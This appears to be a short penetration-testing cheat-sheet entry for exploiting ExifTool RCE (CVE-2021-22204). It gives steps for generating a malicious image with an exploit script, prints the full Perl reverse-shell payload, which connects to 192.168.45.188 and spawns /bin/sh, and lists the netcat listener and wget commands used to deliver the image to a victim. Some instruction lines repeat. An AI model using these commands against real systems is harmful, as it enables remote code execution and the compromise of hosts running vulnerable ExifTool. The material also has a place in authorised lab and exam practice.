EXIFTOOL
RCE
Run the exploit on the attacking machine, this will create an image that contains the exploit
-c use a custom command
-s use a rev shell [IP] [PORT]
Run a listener on the attack machine
Download onto the victim machine
Last updated
Run the exploit on the attacking machine, this will create an image that contains the exploit
-c use a custom command
-s use a rev shell [IP] [PORT]
Run a listener on the attack machine
Download onto the victim machine
Last updated
ββ$ python3 50911.py -s 192.168.45.188 22
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
RUNNING: UNICORD Exploit for CVE-2021-22204
PAYLOAD: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(22,inet_aton('192.168.45.188')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")
RUNTIME: DONE - Exploit image written to 'image.jpg'sudo nc -lvnp 22wget http://192.168.45.188/image.jpg
exiftool image.jpg